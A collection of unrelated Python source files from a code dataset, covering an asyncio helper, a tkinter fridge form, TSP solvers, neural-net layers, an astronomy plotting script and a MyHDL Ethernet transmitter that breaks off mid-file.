in_file.close()\n\n","sub_path":"Labs/lab09a.py","file_name":"lab09a.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"25139206","text":"# Copyright 2018 Canonical Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# __NOTE__\n#\n# Whenever this file is changed, make sure to update the copy of it in\n# ``zaza-openstack-tests``.\n#\n# The ``zaza`` and ``zaza-openstack-tests`` projects are related, and currently\n# the latter is installed as a package inside the former. As a consequence\n# ``zaza-openstack-tests`` needs to carry a copy of this file\n# (``zaza/__init__.py``) as this file will be overwritten by the copy in\n# ``zaza-openstack-tests`` on install.\n#\n# We of course want a better solution to this, but in the interest of time\n# this note is left here until we get around to fixing it properly.\n#\n# __NOTE__\n\n\"\"\"Functions to support converting async function to a sync equivalent.\"\"\"\nimport asyncio\nimport logging\nfrom pkgutil import extend_path\nfrom sys import version_info\n\n\n__path__ = extend_path(__path__, __name__)\n\n\ndef run(*steps):\n \"\"\"Run the given steps in an asyncio loop.\n\n If the tasks spawns other future (tasks) then these are also cleaned up\n after each step is performed.\n\n :returns: The result of the last asyncio.Task\n :rtype: Any\n \"\"\"\n if not steps:\n return\n try:\n loop = asyncio.get_running_loop()\n except RuntimeError:\n loop = asyncio.new_event_loop()\n except AttributeError:\n # Remove once support for Python 3.6 is dropped\n loop = asyncio.get_event_loop()\n\n for step in steps:\n task = loop.create_task(step)\n loop.run_until_complete(asyncio.wait([task]))\n\n # Let's also cancel any remaining tasks:\n while True:\n # issue #445 - asyncio.Task.all_tasks() deprecated in 3.7\n if version_info.major == 3 and version_info.minor >= 7:\n try:\n tasklist = asyncio.all_tasks()\n except RuntimeError:\n # no running event loop\n break\n else:\n tasklist = asyncio.Task.all_tasks()\n pending_tasks = [p for p in tasklist if not p.done()]\n if pending_tasks:\n logging.info(\n \"async -> sync. cleaning up pending tasks: len: {}\"\n .format(len(pending_tasks)))\n for pending_task in pending_tasks:\n pending_task.cancel()\n try:\n loop.run_until_complete(pending_task)\n except asyncio.CancelledError:\n pass\n except Exception as e:\n logging.error(\n \"A pending task caused an exception: {}\"\n .format(str(e)))\n else:\n break\n\n return task.result()\n\n\ndef sync_wrapper(f):\n \"\"\"Convert the given async function into a sync function.\n\n This is only to be called from sync code and it runs all tasks (and cancels\n all tasks at the end of each run) for the code that is being given.\n\n :returns: The de-async'd function\n :rtype: function\n \"\"\"\n def _wrapper(*args, **kwargs):\n async def _run_it():\n return await f(*args, **kwargs)\n return run(_run_it())\n return _wrapper\n","sub_path":"zaza/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"488213306","text":"import SetupAPI\nimport sqlite3\nimport tkinter as tk\nimport DataAPI\n\n\n\ndef CreateFridge():\n try:\n _fridgeID = fridgeID.get()\n _temperature = int(temp.get())\n _numShelves = int(numShelves.get())\n _widthShelves = int(widthShelves.get())\n print(DataAPI.AddFridge(conn, _fridgeID, _temperature, _numShelves, _widthShelves))\n except:\n print(\"ERROR: Invalid data entered\")\n \n \n\ndef console_PrintFridge():\n print(\"Fridge ID: %s\\nTemperature: %s\\nNumShelves: %s\\nNumBoxes: %s\" % (fridgeID.get(), temp.get(), numShelves.get(), widthShelves.get()))\n \n\nconn = sqlite3.connect('Test.db')\nconn.execute(\"PRAGMA foreign_keys = ON\")\nSetupAPI.CreateFridgeTable(conn) \n\nwindow_AddFridge = tk.Tk()\nwindow_AddFridge.geometry(\"300x300\")\nwindow_AddFridge.title(\"ADD FRIDGE\")\n\n#SETTING UP NEW FRIDGE FORM----------------------------------------------------------------\ntk.Label(window_AddFridge, text = \"Fridge ID\").grid(row = 0)\nfridgeID = tk.Entry(window_AddFridge)\nfridgeID.grid(row = 0, column = 1)\n\ntk.Label(window_AddFridge, text = \"Temperature\").grid(row = 1)\ntemp = tk.Entry(window_AddFridge)\ntemp.grid(row = 1, column = 1)\n\ntk.Label(window_AddFridge, text = \"Number of Shelves\").grid(row = 2)\nnumShelves = tk.Entry(window_AddFridge)\nnumShelves.grid(row = 2, column = 1)\n\ntk.Label(window_AddFridge, text = \"Number of Boxes\").grid(row = 3)\nwidthShelves = tk.Entry(window_AddFridge)\nwidthShelves.grid(row = 3, column = 1)\n\ntk.Button(window_AddFridge, text = 'Console Print', command = console_PrintFridge).grid(row = 7, column=1)\ntk.Button(window_AddFridge, text = 'Populate', command = CreateFridge).grid(row = 8, column=1)\n\nwindow_AddFridge.mainloop()\n\n\n\n \n\n\n\n\n\n","sub_path":"TestUI_Fridges.py","file_name":"TestUI_Fridges.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"360831561","text":"from typing import List, Dict\nfrom math import inf\n\n\nclass TspSolver:\n def __init__(self, adjacency_matrix: List[List[float]], start: int = 0) -> None:\n if len(adjacency_matrix) <= 2:\n raise Exception('TSP on 0, 1, or 2 nodes does not make any sense!')\n if len(adjacency_matrix) != len(adjacency_matrix[0]):\n raise Exception('Square matrix required for adjacency matrix!')\n if not 0 <= start < len(adjacency_matrix):\n raise IndexError('Starting node must be 0 <= s < N!')\n\n self._matrix = adjacency_matrix\n self._start = start # starting node\n self._solved = False\n self._N = len(self._matrix)\n\n @property\n def start(self) -> int:\n return self._start\n\n @start.setter\n def start(self, start: int) -> None:\n if self._start != start:\n if not 0 <= start < self._N:\n raise IndexError('Starting node must be 0 <= s < N!')\n\n self._start = start\n self._solved = False # flag to false so that the algorithm can be execute again\n\n def min_cost(self) -> float:\n raise NotImplementedError('Min cost method not implemented!')\n\n def best_route(self) -> List[int]:\n raise NotImplementedError('Best route method not implemented!')\n\n\n\nclass NaiveTspSolver(TspSolver):\n\n def __init__(self, adjacency_matrix: List[List[float]], start: int = 0) -> None:\n super().__init__(adjacency_matrix, start)\n # caching all routes to prevent expensive execution\n # key: cost, value: [[nodes of a route]]\n self._routes = {}\n\n def min_cost(self) -> float:\n self._solve()\n return min(self._routes)\n\n def best_route(self) -> List[int]:\n self._solve()\n return self._routes[self.min_cost()][0]\n\n def _solve(self) -> None:\n if self._solved:\n return\n\n # starting point might have changed, so clear it first\n self._routes.clear()\n\n route = [self._start]\n nodes = [x for x in range(self._N) if x != self._start]\n self._tsp(route, nodes, 0)\n\n # prevent re-execute\n self._solved = True\n\n # route param requires a list with starting node in it, else it will give key error\n def _tsp(self, route: List[int], nodes: List[int], cost: float) -> None:\n if len(nodes) == 0:\n cost = round(cost, 4)\n if cost in self._routes:\n self._routes[cost].append(route)\n else:\n self._routes[cost] = [route]\n return\n\n for n in range(len(nodes)):\n self._tsp(route=route + [nodes[n]], nodes=nodes[:n] + nodes[n + 1:],\n cost=cost + self._matrix[route[-1]][nodes[n]])\n\n\nclass DpTspSolver(TspSolver):\n\n def __init__(self, adjacency_matrix: List[List[float]], start: int = 0) -> None:\n super().__init__(adjacency_matrix, start)\n self._min_cost = 0\n self._best_route = []\n self._END_STATE = (1 << self._N) - 1 # all bits are set to 1 (meaning all the nodes have been visited)\n\n def min_cost(self) -> float:\n self._solve()\n return self._min_cost\n\n def best_route(self) -> List[int]:\n self._solve()\n return self._best_route\n\n def _solve(self) -> None:\n if self._solved:\n return\n\n cost_memo = {}\n node_memo = {}\n state = 1 << self._start\n self._min_cost = self._tsp(self._start, state, cost_memo, node_memo)\n self._best_route = self._build_route(self._start, state, node_memo)\n\n # prevent re-execute\n self._solved = True\n\n def _tsp(self, curr: int, state: int, cost_memo: Dict, node_memo: Dict) -> float:\n if state == self._END_STATE:\n return 0 # because we are not going back to starting\n\n if (curr, state) in cost_memo:\n return cost_memo[(curr, state)]\n\n min_cost = inf\n next_node = -1\n for _next in range(self._N):\n # skip if _next has been visited\n if state & (1 << _next) != 0:\n continue\n\n next_state = state | (1 << _next)\n cost = round(self._matrix[curr][_next] + self._tsp(_next, next_state, cost_memo, node_memo), 4)\n if cost < min_cost:\n min_cost = cost\n next_node = _next\n\n node_memo[(curr, state)] = next_node\n cost_memo[(curr, state)] = min_cost\n return min_cost\n\n def _build_route(self, curr: int, state: int, node_memo: Dict) -> List[int]:\n route = [curr]\n\n while True:\n if (curr, state) not in node_memo:\n break\n next_node = node_memo[(curr, state)]\n route.append(next_node)\n curr = next_node\n state = state | (1 << next_node)\n\n return route\n\n# def permute(a: List, b: List) -> Iterator:\n# if len(b) == 0:\n# yield a\n#\n# for n in range(len(b)):\n# yield from permute(a + [b[n]], b[:n] + b[n + 1:])\n","sub_path":"tripy/algorithms/tsp.py","file_name":"tsp.py","file_ext":"py","file_size_in_byte":5015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"306404917","text":"import numpy as np\n\n\n\ndef softmax(predictions: np.array):\n '''\n Computes probabilities from scores\n\n Arguments:\n predictions, np array, shape is either (N) or (batch_size, N) -\n classifier output\n\n Returns:\n probs, np array of the same shape as predictions -\n probability for every class, 0..1\n '''\n if len(predictions.shape) == 1:\n probs = predictions.copy() - np.max(predictions)\n result = np.exp(probs) / np.sum(np.exp(probs))\n else:\n max_array = np.repeat(np.max(predictions, axis=1), predictions.shape[1]).reshape(predictions.shape)\n probs = predictions.copy() - max_array\n result = np.exp(probs) / np.repeat(np.sum(np.exp(probs), axis=1), predictions.shape[1]).reshape(predictions.shape)\n\n return result\n\n\ndef cross_entropy_loss(probs, target_index):\n '''\n Computes cross-entropy loss\n\n Arguments:\n probs, np array, shape is either (N) or (batch_size, N) -\n probabilities for every class\n target_index: np array of int, shape is (1) or (batch_size) -\n index of the true class for given sample(s)\n\n Returns:\n loss: single value\n '''\n probs_copy = probs.copy()\n if type(target_index) == int and len(probs.shape) == 1:\n return -np.log(probs_copy[target_index])\n else:\n length = target_index.shape[0]\n log_likelihood = -np.log(\n probs[range(length), target_index.reshape(1, -1)])\n\n return np.sum(log_likelihood) / length\n\n\ndef l2_regularization(W, reg_strength):\n \"\"\"\n Computes L2 regularization loss on weights and its gradient\n\n Arguments:\n W, np array - weights\n reg_strength - float value\n\n Returns:\n loss, single value - l2 regularization loss\n gradient, np.array same shape as W - gradient of weight by l2 loss\n \"\"\"\n loss = reg_strength * np.sum(W * W)\n\n grad = reg_strength * 2 * W\n\n return loss, grad\n\n\ndef softmax_with_cross_entropy(preds, target_index):\n \"\"\"\n Computes softmax and cross-entropy loss for model predictions,\n including the gradient\n\n Arguments:\n predictions, np array, shape is either (N) or (batch_size, N) -\n classifier output\n target_index: np array of int, shape is (1) or (batch_size) -\n index of the true class for given sample(s)\n\n Returns:\n loss, single value - cross-entropy loss\n dprediction, np array same shape as predictions - gradient of predictions by loss value\n \"\"\"\n p = preds.copy()\n target = target_index\n if len(preds.shape) == 1:\n p = p.reshape(1, -1)\n if type(target_index) == int:\n target = np.array([target_index])\n\n probs = softmax(p)\n loss = cross_entropy_loss(probs, target)\n\n y = np.eye(p.shape[1])[target]\n y = y.reshape(p.shape[0], -1)\n dprediction = probs - y\n\n if len(preds.shape) == 1:\n dprediction = dprediction.reshape(-1)\n else:\n dprediction /= p.shape[0]\n\n return loss, dprediction\n\n\nclass Param:\n \"\"\"\n Trainable parameter of the model\n Captures both parameter value and the gradient\n \"\"\"\n\n def __init__(self, value):\n self.value = value\n self.grad = np.zeros_like(value)\n\n\nclass ReLULayer:\n def __init__(self):\n pass\n\n def forward(self, X):\n # TODO: Implement forward pass\n # Hint: you'll need to save some information about X\n # to use it later in the backward pass\n self.index = X > 0\n return X * self.index\n\n def backward(self, d_out):\n \"\"\"\n Backward pass\n\n Arguments:\n d_out, np array (batch_size, num_features) - gradient\n of loss function with respect to output\n\n Returns:\n d_result: np array (batch_size, num_features) - gradient\n with respect to input\n \"\"\"\n return self.index.astype(float) * d_out\n\n def params(self):\n # ReLU Doesn't have any parameters\n return {}\n\n\nclass FullyConnectedLayer:\n def __init__(self, n_input, n_output):\n self.W = Param(0.001 * np.random.randn(n_input, n_output))\n self.B = Param(0.001 * np.random.randn(1, n_output))\n self.X = None\n\n def forward(self, X):\n self.X = X\n return X.dot(self.W.value) + self.B.value\n\n def backward(self, d_out):\n \"\"\"\n Backward pass\n Computes gradient with respect to input and\n accumulates gradients within self.W and self.B\n\n Arguments:\n d_out, np array (batch_size, n_output) - gradient\n of loss function with respect to output\n\n Returns:\n d_result: np array (batch_size, n_input) - gradient\n with respect to input\n \"\"\"\n self.W.grad = self.X.T.dot(d_out)\n self.B.grad = np.sum(d_out, axis=0, keepdims=True)\n\n return d_out.dot(self.W.value.T)\n\n def params(self):\n return {'W': self.W, 'B': self.B}\n","sub_path":"assignments/assignment2/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":4895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"522825234","text":"try : \n a = 3\n if a < 4 :\n \n # throws ZeroDivisionError for a = 3 \n b = a/(a-3)\n \n # throws NameError if a >= 4\n print (\"Value of b = \", b)\n \n# note that braces () are necessary here for multiple exceptions\nexcept(ZeroDivisionError, NameError):\n print (\"\\nError Occurred and Handled\")\n","sub_path":"advance1/exception_handling/except1.py","file_name":"except1.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"62120443","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 21 11:42:35 2019\n\n@author: ppxee\n\"\"\"\n\n### Import required libraries ###\nimport matplotlib.pyplot as plt #for plotting\nfrom astropy.io import fits #for handling fits\nfrom astropy.table import Table #for handling tables\nimport numpy as np #for handling arrays\n#import math\n#from astropy.stats import median_absolute_deviation\nimport vari_funcs #my module to help run code neatly\nplt.close('all')\nplt.style.use('default')\n\n### Get fits files ###\n#xdata = fits.open('variable_tables/no06_variables_chi30_nospectra_xray.fits')[1].data\n#tbdata = fits.open('variable_tables/no06_variables_chi30_nospectra.fits')[1].data\n#xdata = fits.open('variable_tables/no06_variables_chi30_noUDSz_xray.fits')[1].data\n#tbdata = fits.open('variable_tables/no06_variables_chi30_noUDSz.fits')[1].data\nchandata = fits.open('variable_tables/no06_variables_chi30_chandata_DR11data_restframe.fits')[1].data\nxmmdata = fits.open('variable_tables/no06_variables_chi30_xmmdata_DR11data_restframe.fits')[1].data\ntbdata = fits.open('variable_tables/no06_variables_chi30_DR11data_restframe.fits')[1].data\n\n### Remove edges ###\ntbdata = vari_funcs.remove_edges(tbdata)\n#xdata = vari_funcs.remove_edges(xdata)\n\nchandata = vari_funcs.remove_edges(chandata)\nxmmdata = vari_funcs.remove_edges(xmmdata)\n\nnontb = tbdata[~tbdata['X-ray']]\n#xtb = tbdata[tbdata['X-ray']]\n\n### Apply a magnitude cut ###\nhightbdata = tbdata[tbdata['iMAG_20']<24]\nhighnontb = nontb[nontb['iMAG_20']<24]\n#xdata = xdata[xdata['iMAG_20']<24]\n#\nhighchandata = chandata[chandata['iMAG_20']<24]\nhighxmmdata = xmmdata[xmmdata['iMAG_20']<24]\n\n#tbdata = tbdata[tbdata['RMAG_20']<24.5]\n#nontb = nontb[nontb['RMAG_20']<24.5]\n#xdata = xdata[xdata['RMAG_20']<24.5]\n\n\n\n### Get positions ###\nnonRA = nontb['ALPHA_J2000']\nnonDec = nontb['DELTA_J2000']\n#xRA = xdata['ALPHA_J2000']\n#xDec = xdata['DELTA_J2000']\n\nchanRA = chandata['ALPHA_J2000']\nchanDec = chandata['DELTA_J2000']\nxmmRA = xmmdata['ALPHA_J2000']\nxmmDec = xmmdata['DELTA_J2000']\nxRA = np.append(chanRA, xmmRA)\nxDec = np.append(chanDec, xmmDec)\n\nhighnonRA = highnontb['ALPHA_J2000']\nhighnonDec = highnontb['DELTA_J2000']\n#xRA = xdata['ALPHA_J2000']\n#xDec = xdata['DELTA_J2000']\n\nhighchanRA = highchandata['ALPHA_J2000']\nhighchanDec = highchandata['DELTA_J2000']\nhighxmmRA = highxmmdata['ALPHA_J2000']\nhighxmmDec = highxmmdata['DELTA_J2000']\nhighxRA = np.append(highchanRA, highxmmRA)\nhighxDec = np.append(highchanDec, highxmmDec)\n\n### Plot positions ###\nplt.figure(figsize=[8,8])\nplt.plot(highnonRA, highnonDec, 'bo',markersize=10)\nplt.plot(highxRA, highxDec, 'ro',markersize=10)\nplt.plot(nonRA, nonDec, 'b+',alpha=0.5,zorder=0)\nplt.plot(xRA, xDec, 'r+',alpha=0.5,zorder=0)\nplt.xlim(xmin=34, xmax=34.9)\nplt.ylim(ymin=-5.6, ymax=-4.65)\n#plt.xlim(xmin=34.06, xmax=34.87)\n#plt.ylim(ymin=-5.54, ymax=-4.7)\nplt.gca().invert_xaxis()\nplt.xlabel('RA')\nplt.ylabel('Dec')\n\n### Plot on the IMACS FoV ###\ndiam = 27.4/60 # 27.4 arcmin\ncircle1= plt.Circle((34.645,-4.88), radius=diam/2, fill=False, color='k')\nplt.gca().add_artist(circle1)\ncircle2= plt.Circle((34.23,-4.98), radius=diam/2, fill=False, color='k')\nplt.gca().add_artist(circle2)\ncircle3= plt.Circle((34.65,-5.25), radius=diam/2, fill=False, color='k')\nplt.gca().add_artist(circle3)\ncircle4= plt.Circle((34.34,-5.33), radius=diam/2, fill=False, color='k')\nplt.gca().add_artist(circle4)\nplt.tight_layout()\n\nprint('Full sample')\nprint('Total = '+str(len(tbdata)))\nprint('X-ray = '+str(len(xRA)))\n\n### plot r band hist of sample ###\n#mask1 = tbdata['RMAG_20']!=99\n#rmag = tbdata['RMAG_20']#[mask1]\n#mask1 = xdata['RMAG_20']!=99\n#xrmag = xdata['RMAG_20'][mask1]\n\n#xrayrmag = np.append(chanrmag,xmmrmag)\n#med = np.median(nonrmag)\n#plt.figure()\n#plt.hist(nonrmag, color='b', label = 'Non X-ray',histtype='step')\n#plt.hist(xrayrmag, color='r', label='X-ray',histtype='step')\n#plt.xlabel('R Band Magnitude')\n#plt.ylabel('Counts')\n#plt.legend()\n#plt.tight_layout()\n###%% Restrict to >1e4 Average Flux ###\n##\n#### Create arrays of flux values ###\n##allflux = vari_funcs.flux5_stacks(tbdata)\n##flux = vari_funcs.flux5_stacks(nontb)\n##chanflux = vari_funcs.flux5_stacks(chandata) \n##xmmflux = vari_funcs.flux5_stacks(xmmdata)\n##\n##### Get average flux ###\n##avgallflux = np.nanmean(allflux, axis=1)\n##avgflux = np.nanmean(flux, axis=1)\n##avgchanflux = np.nanmean(chanflux, axis=1)\n##avgxmmflux = np.nanmean(xmmflux, axis=1)\n##\n##hightbdata = tbdata[avgallflux > 1e4]\n##highnontb = nontb[avgflux > 1e4]\n##highchandata = chandata[avgchanflux > 1e4]\n##highxmmdata = xmmdata[avgxmmflux > 1e4]\n##\n##### Get positions ###\n##nonRA = highnontb['ALPHA_J2000']\n##nonDec = highnontb['DELTA_J2000']\n##chanRA = highchandata['ALPHA_J2000']\n##chanDec = highchandata['DELTA_J2000']\n##xmmRA = highxmmdata['ALPHA_J2000']\n##xmmDec = highxmmdata['DELTA_J2000']\n#\n#### Plot positions ###\n#plt.figure(figsize=[8,8])\n#plt.plot(nonRA, nonDec, 'bo')\n#plt.plot(chanRA, chanDec, 'ro')\n#plt.plot(xmmRA, xmmDec, 'ro')\n#plt.xlim(xmin=34, xmax=34.9)\n#plt.ylim(ymin=-5.6, ymax=-4.65)\n#plt.gca().invert_xaxis()\n#plt.xlabel('RA')\n##plt.savefig('plots/Chi_variables/no06_extra_clean/positions_highflux.pdf')\n#\n#### Plot on the IMACS FoV ###\n#diam = 27.4/60 # 27.4 arcmin\n#circle1= plt.Circle((34.64,-4.93), radius=diam/2, fill=False, color='k')\n#plt.gca().add_artist(circle1)\n#circle2= plt.Circle((34.23,-4.93), radius=diam/2, fill=False, color='k')\n#plt.gca().add_artist(circle2)\n#circle3= plt.Circle((34.64,-5.32), radius=diam/2, fill=False, color='k')\n#plt.gca().add_artist(circle3)\n#circle4= plt.Circle((34.23,-5.32), radius=diam/2, fill=False, color='k')\n#plt.gca().add_artist(circle4)\n##print('High Flux')\n#print('Total = '+str(len(hightbdata)))\n#print('X-ray = '+str(len(chanRA)+len(xmmRA)))\n\n#### plot r band hist of high flux sample ###\n#mask1 = hightbdata['RMAG_20']!=99\n#rmag = hightbdata['RMAG_20'][mask1]\n#mask1 = highnontb['RMAG_20']!=99\n#nonrmag = highnontb['RMAG_20'][mask1]\n#mask1 = highchandata['RMAG_20']!=99\n#chanrmag = highchandata['RMAG_20'][mask1]\n#mask1 = highxmmdata['RMAG_20']!=99\n#xmmrmag = highxmmdata['RMAG_20'][mask1]\n#\n#xrayrmag = np.append(chanrmag,xmmrmag)\n#plt.figure()\n#plt.hist(nonrmag, color='b', label = 'Non X-ray',histtype='step')\n#plt.hist(xrayrmag, color='r', label='X-ray',histtype='step')\n#plt.xlabel('R Band Magnitude')\n#plt.ylabel('Counts')\n#plt.legend()\n#plt.tight_layout()","sub_path":"positions_imacs.py","file_name":"positions_imacs.py","file_ext":"py","file_size_in_byte":6380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"411254442","text":"from Globals import *\r\nfrom CRC32 import CRC32\r\nTxS = enum('IDLE', 'ETH', 'ARP', 'IP', 'UDP', 'DATA', 'CRC','GAP', encoding=\"one_hot\")\r\n\r\ndef ToChar(a):\r\n #b = Signal(modbv(0)[4:])\r\n b = 0\r\n if a <= 9:\r\n b = a + 17\r\n else:\r\n b = a + 24\r\n return b\r\n\r\n@block\r\ndef Mac_Tx(clk,TxEn, TxErr, TxData, TxEnd, SendEn, SendData, SendDataEn, srcMac, desMac, EtherType, IP_Total_Length, IP_Protocal,\r\n srcIP, desIP, srcPort, desPort, UDP_Length, Data_Length, GapLength,TxCNT, Ram, IDLE):\r\n State, StateReg = (Signal(TxS.IDLE) for i in range(2))\r\n CNT = Signal(modbv(0)[12:0])\r\n EthHeader, IPHeader, UDPHeader,ARP_Data, PktData, TxDataReg = (Signal(modbv(0)[8:]) for frog in range(6))\r\n TxEnReg,TxEnReg1 = (Signal(bool(0)) for frog in range(2))\r\n CrcReset, CrcEnable = (Signal(bool(0)) for i in range(2))\r\n Crc, CrcNext = (Signal(modbv(0xffffffff)[32:]) for i in range(2))\r\n IPHeader_CheckSum = Signal(modbv(0)[32:])\r\n\r\n\r\n iCRC32 = CRC32(clk, CrcReset, TxDataReg, CrcEnable, Crc, CrcNext)\r\n\r\n @always_seq(clk.posedge, reset=None)\r\n def Seq():\r\n if State == TxS.IDLE:\r\n IDLE.next = 1\r\n CNT.next = 0\r\n EthHeader.next = 0\r\n IPHeader.next = 0\r\n UDPHeader.next = 0\r\n TxEnReg.next = 0\r\n TxErr.next = 0\r\n Ram.we.next = 0\r\n Ram.addr.next = 0\r\n Ram.din.next = 0\r\n TxEnd.next = 0\r\n CrcReset.next = 0\r\n SendDataEn.next = 0\r\n IPHeader_CheckSum.next = 0\r\n if SendEn:\r\n State.next = TxS.ETH\r\n IDLE.next = 0\r\n\r\n if State == TxS.ETH:\r\n if CNT < Ether_Header_Len - 1:\r\n CNT.next = CNT + 1\r\n else:\r\n CNT.next = 0\r\n if EtherType == EtherType_IPv4:\r\n State.next = TxS.IP\r\n elif EtherType == EtherType_ARP:\r\n State.next = TxS.ARP\r\n else:\r\n TxErr.next = 1\r\n State.next = TxS.GAP\r\n\r\n if CNT == 0: TxEnReg.next = 1\r\n if CNT <= 6: EthHeader.next = 0x55\r\n if CNT == 7: EthHeader.next = 0xd5\r\n if CNT == 8: EthHeader.next = desMac[48:40]\r\n if CNT == 9: EthHeader.next = desMac[40:32]\r\n if CNT == 10: EthHeader.next = desMac[32:24]\r\n if CNT == 11: EthHeader.next = desMac[24:16]\r\n if CNT == 12: EthHeader.next = desMac[16:8]\r\n if CNT == 13: EthHeader.next = desMac[8:]\r\n if CNT == 14: EthHeader.next = srcMac[48:40]\r\n if CNT == 15: EthHeader.next = srcMac[40:32]\r\n if CNT == 16: EthHeader.next = srcMac[32:24]\r\n if CNT == 17: EthHeader.next = srcMac[24:16]\r\n if CNT == 18: EthHeader.next = srcMac[16:8]\r\n if CNT == 19: EthHeader.next = srcMac[8:]\r\n if CNT == 20: EthHeader.next = EtherType[16:8]\r\n if CNT == 21: EthHeader.next = EtherType[8:]\r\n\r\n if CNT == 1: Ram.din.next = 53 #T #For Gui\r\n if CNT == 2: Ram.din.next = 89 #x\r\n if CNT == 3: Ram.din.next = 27 #:\r\n if CNT >= 1 and CNT <= 3:\r\n Ram.we.next = 1\r\n if CNT > 1:\r\n Ram.addr.next = Ram.addr + 1\r\n else:\r\n Ram.we.next = 0\r\n if CNT == 9: CrcEnable.next = 1\r\n\r\n if State == TxS.ARP:\r\n if CNT < ARP_Len + 4 - 1:\r\n CNT.next = CNT + 1\r\n else:\r\n CNT.next = 0\r\n State.next = TxS.GAP\r\n\r\n ARP_Data.next = 0xab\r\n if CNT == 1: Ram.din.next = 34 #A #For Gui\r\n if CNT == 2: Ram.din.next = 51 #R\r\n if CNT == 3: Ram.din.next = 49 #P\r\n if CNT >= 1 and CNT <= 3:\r\n Ram.we.next = 1\r\n Ram.addr.next = Ram.addr + 1\r\n else:\r\n Ram.we.next = 0\r\n\r\n if State == TxS.IP:\r\n EthHeader.next = 0\r\n if CNT < IP_Header_Len - 1:\r\n CNT.next = CNT + 1\r\n else:\r\n CNT.next = 0\r\n State.next = TxS.UDP\r\n\r\n if CNT == 0: IPHeader.next = IP_Version_HeaderLen\r\n if CNT == 1: IPHeader.next = TypeofService\r\n if CNT == 2: IPHeader.next = IP_Total_Length[16:8]\r\n if CNT == 3: IPHeader.next = IP_Total_Length[8:]\r\n if CNT == 4: IPHeader.next = 0 #标识 Identification\r\n if CNT == 5: IPHeader.next = 0\r\n if CNT == 6: IPHeader.next = 0 #Flags, Fragment Offset\r\n if CNT == 7: IPHeader.next = 0\r\n if CNT == 8: IPHeader.next = 0x40 #Time to Live\r\n if CNT == 9: IPHeader.next = IP_Protocal #Protocol UDP,TCP\r\n if CNT == 10: IPHeader.next = IPHeader_CheckSum[16:8] #Header Checksum\r\n if CNT == 11: IPHeader.next = IPHeader_CheckSum[8:0]\r\n if CNT == 12: IPHeader.next = srcIP[32:24]\r\n if CNT == 13: IPHeader.next = srcIP[24:16]\r\n if CNT == 14: IPHeader.next = srcIP[16:8]\r\n if CNT == 15: IPHeader.next = srcIP[8:]\r\n if CNT == 16: IPHeader.next = desIP[32:24]\r\n if CNT == 17: IPHeader.next = desIP[24:16]\r\n if CNT == 18: IPHeader.next = desIP[16:8]\r\n if CNT == 19: IPHeader.next = desIP[8:]\r\n\r\n if CNT == 0: IPHeader_CheckSum.next = IPHeader_CheckSum + TypeofService + IP_Version_HeaderLen << 8\r\n if CNT == 1: IPHeader_CheckSum.next = IPHeader_CheckSum + IP_Total_Length\r\n if CNT == 2: IPHeader_CheckSum.next = IPHeader_CheckSum + IP_Protocal + 0x4000\r\n if CNT == 3: IPHeader_CheckSum.next = IPHeader_CheckSum + srcIP[32:16] + srcIP[16:]\r\n if CNT == 4: IPHeader_CheckSum.next = IPHeader_CheckSum + desIP[32:16] + desIP[16:]\r\n if CNT == 5:\r\n if IPHeader_CheckSum[32:16] == 0:\r\n IPHeader_CheckSum.next[16:] = ~IPHeader_CheckSum[16:]\r\n else:\r\n IPHeader_CheckSum.next[16:] = ~(IPHeader_CheckSum[16:] + IPHeader_CheckSum[32:16])\r\n\r\n\r\n if CNT == 10:\r\n if IP_Protocal == IP_Protocal_TCP: Ram.din.next = 53 #T\r\n elif IP_Protocal == IP_Protocal_UDP: Ram.din.next = 54 #U\r\n else: Ram.din.next = 57 #X\r\n if CNT == 11:\r\n if IP_Protocal == IP_Protocal_TCP: Ram.din.next = 36 #C\r\n elif IP_Protocal == IP_Protocal_UDP: Ram.din.next = 37 #D\r\n else: Ram.din.next = 57 #X\r\n if CNT >= 10 and CNT <= 11:\r\n Ram.we.next = 1\r\n Ram.addr.next = Ram.addr + 1\r\n else:\r\n Ram.we.next = 0\r\n\r\n if State == TxS.UDP:\r\n IPHeader.next = 0\r\n if CNT < UDP_Header_Len - 1:\r\n CNT.next = CNT + 1\r\n else:\r\n CNT.next = 0\r\n State.next = TxS.DATA\r\n\r\n if CNT == 0: UDPHeader.next = srcPort[16:8]\r\n if CNT == 1: UDPHeader.next = srcPort[8:]\r\n if CNT == 2: UDPHeader.next = desPort[16:8]\r\n if CNT == 3: UDPHeader.next = desPort[8:]\r\n if CNT == 4: UDPHeader.next = UDP_Length[16:8] #UDP Length\r\n if CNT == 5: UDPHeader.next = UDP_Length[8:]\r\n if CNT == 6: UDPHeader.next = 0 #UDP Header Checksum\r\n if CNT == 7: UDPHeader.next = 0\r\n\r\n if CNT == 6: SendDataEn.next = 1\r\n\r\n\r\n if State == TxS.DATA:\r\n UDPHeader.next = 0\r\n\r\n if CNT < Data_Length - 1 or CNT < 18 - 1: #UDP_Length - UDP_Header_Len\r\n CNT.next = CNT + 1\r\n else:\r\n CNT.next = 0\r\n State.next = TxS.CRC\r\n\r\n # if CNT == 0: PktData.next = TxCNT[24:16]\r\n # if CNT == 1: PktData.next = TxCNT[16: 8]\r\n # if CNT == 2: PktData.next = 